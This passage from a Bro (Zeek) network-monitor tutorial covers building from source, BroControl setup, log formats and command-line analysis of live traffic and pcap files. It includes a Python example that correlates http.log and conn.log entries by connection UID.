wget https://www.bro.org/downloads/release/bro-2.5.tar.gz
tar -xvf bro-2.5.tar.gz

Now change to the extracted directory (assuming you created /bro/ and extracted the archive there):

cd /bro/bro-2.5
./configure
make
sudo make install

The installation will take a while!

By default Bro will be installed to /usr/local/bro/bin.

Modify your PATH environment variable to include the Bro binaries:

export PATH=/usr/local/bro/bin:$PATH

To make the change permanent, add the line above to your ~/.bashrc file.

A Minimal Starting Configuration

These are the basic configuration changes to make for a minimal BroControl installation that will manage a single Bro instance on the localhost:

  1. In $PREFIX/etc/node.cfg, set the right interface to monitor.
  2. In $PREFIX/etc/networks.cfg, comment out the default settings and add the networks that Bro will consider local to the monitored environment.
  3. In $PREFIX/etc/broctl.cfg, change the MailTo email address to a desired recipient and the LogRotationInterval to a desired log archival frequency.

Now start the BroControl shell like:

broctl

Since this is the first-time use of the shell, perform an initial installation of the BroControl configuration:

[BroControl] > install

Then start up a Bro instance:

[BroControl] > start

If there are errors while trying to start the Bro instance, you can view the details with the diag command. If started successfully, the Bro instance will begin analyzing traffic according to a default policy and output the results in $PREFIX/logs.

Note

The user starting BroControl needs permission to capture network traffic. If you are not root, you may need to grant further privileges to the account you’re using; see the FAQ. Also, if it looks like Bro is not seeing any traffic, check out the FAQ entry on checksum offloading.

You can leave it running for now, but to stop this Bro instance you would do:

[BroControl] > stop

Browsing Log Files

By default, logs are written out in human-readable (ASCII) format and data is organized into columns (tab-delimited). Logs that are part of the current rotation interval are accumulated in $PREFIX/logs/current/ (if Bro is not running, the directory will be empty). For example, the http.log contains the results of Bro HTTP protocol analysis. Here are the first few columns of http.log:

# ts          uid          orig_h        orig_p  resp_h         resp_p
1311627961.8  HSH4uV8KVJg  192.168.1.100 52303   192.150.187.43 80

Logs that deal with analysis of a network protocol will often start like this: a timestamp, a unique connection identifier (UID), and a connection 4-tuple (originator host/port and responder host/port). The UID can be used to identify all logged activity (possibly across multiple log files) associated with a given connection 4-tuple over its lifetime.

The remaining columns of protocol-specific logs then detail the protocol-dependent activity that's occurring. E.g. http.log's next few columns (shortened for brevity) show a request to the root of the Bro website:

# method   host         uri  referrer  user_agent
GET        bro.org  /    -         <...>Chrome/12.0.742.122<...>

Some logs are worth explicit mention:

conn.log
Contains an entry for every connection seen on the wire, with basic properties such as time and duration, originator and responder IP addresses, services and ports, payload size, and much more. This log provides a comprehensive record of the network’s activity.
notice.log
Identifies specific activity that Bro recognizes as potentially interesting, odd, or bad. In Bro-speak, such activity is called a “notice”.

By default, BroControl regularly takes all the logs from $PREFIX/logs/current and archives/compresses them to a directory named by date, e.g. $PREFIX/logs/2011-10-06. The frequency at which this is done can be configured via the LogRotationInterval option in $PREFIX/etc/broctl.cfg.
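The UID correlation described above is the everyday operation on these logs: find a connection in conn.log, then pull every http.log (or dns.log, ssl.log, notice.log) entry that shares its uid. The following Python is an added example, not Bro's own tooling: a minimal reader for the on-disk ASCII format (a "#fields" header naming the columns, tab-separated rows, "-" for unset values, other "#" lines as metadata) and a join of http.log onto conn.log by uid. The two log excerpts are constructed samples in that layout, modelled on the http.log columns shown above.

```python
"""Parse Bro's tab-delimited ASCII logs and correlate them by connection UID.

Added example (not Bro's own tooling): a minimal reader for the log format
described above, plus a join of http.log onto conn.log using the uid column,
so every HTTP request can be tied back to its connection 4-tuple. The two
log excerpts are constructed samples in Bro's on-disk layout (a "#fields"
header naming the columns, tab-separated rows, "-" for unset values).
"""

SEP = "\t"

# Constructed sample conn.log: one HTTP and one SSL connection from the same host.
CONN_LOG = "\n".join([
    "#separator \\x09",
    SEP.join(["#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h",
              "id.resp_p", "proto", "service", "duration"]),
    SEP.join(["1311627961.8", "HSH4uV8KVJg", "192.168.1.100", "52303",
              "192.150.187.43", "80", "tcp", "http", "0.5"]),
    SEP.join(["1311627962.1", "CjYx5a2bUV9", "192.168.1.100", "52304",
              "192.150.187.43", "443", "tcp", "ssl", "1.2"]),
    "#close 2011-07-25-22-00-00",
])

# Constructed sample http.log: two requests carried by the first connection above.
HTTP_LOG = "\n".join([
    SEP.join(["#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h",
              "id.resp_p", "method", "host", "uri", "referrer", "user_agent"]),
    SEP.join(["1311627961.8", "HSH4uV8KVJg", "192.168.1.100", "52303",
              "192.150.187.43", "80", "GET", "bro.org", "/", "-",
              "Mozilla/5.0 Chrome/12.0.742.122"]),
    SEP.join(["1311627961.9", "HSH4uV8KVJg", "192.168.1.100", "52303",
              "192.150.187.43", "80", "GET", "bro.org", "/download.html", "-",
              "Mozilla/5.0 Chrome/12.0.742.122"]),
])


def parse_bro_log(text):
    """Return one dict per data row, keyed by the names in the #fields header.
    Other '#' lines (#separator, #types, #close, ...) are metadata and skipped;
    the Bro placeholders '-' (unset) and '(empty)' become None and ''."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split(SEP)[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data row before #fields header")
        values = line.split(SEP)
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} columns, got {len(values)}")
        row = {}
        for name, value in zip(fields, values):
            row[name] = None if value == "-" else "" if value == "(empty)" else value
        rows.append(row)
    return rows


def join_by_uid(conn_rows, http_rows):
    """Map each connection uid to its conn.log row and the http.log rows sharing that uid."""
    joined = {row["uid"]: {"conn": row, "http": []} for row in conn_rows}
    for row in http_rows:
        if row["uid"] in joined:
            joined[row["uid"]]["http"].append(row)
    return joined


def describe(joined, uid):
    """Render a one-line summary of a connection and the URIs requested over it."""
    conn = joined[uid]["conn"]
    uris = [f"{r['method']} {r['host']}{r['uri']}" for r in joined[uid]["http"]]
    return (f"{conn['id.orig_h']}:{conn['id.orig_p']} -> "
            f"{conn['id.resp_h']}:{conn['id.resp_p']} {conn['service']} "
            f"requests={uris}")


if __name__ == "__main__":
    joined = join_by_uid(parse_bro_log(CONN_LOG), parse_bro_log(HTTP_LOG))
    for uid in joined:
        print(uid, describe(joined, uid))
```

Reading the column names from the #fields line rather than hard-coding them is what keeps the reader working when a site's local.bro adds or removes columns; the strict column-count check catches a truncated line in a log that was rotated mid-write. For day-to-day use, bro-cut (which needs gawk, as listed under the optional dependencies) does the same column selection from the shell.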

Bro as a Command-Line Utility

If you prefer not to use BroControl (e.g. don’t need its automation and management features), here’s how to directly control Bro for your analysis activities from the command line for both live traffic and offline working from traces.

Monitoring Live Traffic

Analyzing live traffic from an interface is simple:

bro -i en0 <list of scripts to load>

en0 can be replaced by the interface of your choice and for the list of scripts, you can just use “all” for now to perform all the default analysis that’s available.

Bro will output log files into the working directory.

Note

The FAQ entries about capturing as an unprivileged user and checksum offloading are particularly relevant at this point.

To use the site-specific local.bro script, just add it to the command-line:

bro -i en0 local

This will cause Bro to print a warning about the Site::local_nets variable not being configured. You can supply this information at the command line like this (supply your "local" subnets in place of the example subnets):

bro -r mypackets.trace local "Site::local_nets += { 1.2.3.0/24, 5.6.7.0/24 }"

Reading Packet Capture (pcap) Files

Capturing packets from an interface and writing them to a file can be done like this:

sudo tcpdump -i en0 -s 0 -w mypackets.trace

Where en0 can be replaced by the correct interface for your system as shown by e.g. ifconfig. (The -s 0 argument tells it to capture whole packets; in cases where it’s not supported use -s 65535 instead).

After a while of capturing traffic, kill the tcpdump (with ctrl-c), and tell Bro to perform all the default analysis on the capture:

bro -r mypackets.trace

Bro will output log files into the working directory.

If you are interested in more detection, you can again load the local script that we include as a suggested configuration:

bro -r mypackets.trace local

Telling Bro Which Scripts to Load

A command-line invocation of Bro typically looks like:

bro <options> <policies...>

Where the last arguments are the specific policy scripts that this Bro instance will load. These arguments don’t have to include the .bro file extension, and if the corresponding script resides under the default installation path, $PREFIX/share/bro, then it requires no path qualification. Further, a directory of scripts can be specified as an argument to be loaded as a “package” if it contains a __load__.bro script that defines the scripts that are part of the package.

This example does all of the base analysis (primarily protocol logging) and adds SSL certificate validation.

bro -r mypackets.trace protocols/ssl/validate-certs

You might notice that a script you load from the command line uses the @load directive in the Bro language to declare dependence on other scripts. This directive is similar to the #include of C/C++, except the semantics are, “load this script if it hasn’t already been loaded.”

Note

If one wants Bro to be able to load scripts that live outside the default directories in Bro’s installation root, the BROPATH environment variable will need to be extended to include all the directories that need to be searched for scripts. See the default search path by doing bro --help.

Running Bro Without Installing

For developers that wish to run Bro directly from the build/ directory (i.e., without performing make install), they will have to first adjust BROPATH to look for scripts and additional files inside the build directory. Sourcing either build/bro-path-dev.sh or build/bro-path-dev.csh as appropriate for the current shell accomplishes this and also augments your PATH so you can use the Bro binary directly:

./configure
make
source build/bro-path-dev.sh
bro <options>

Have fun!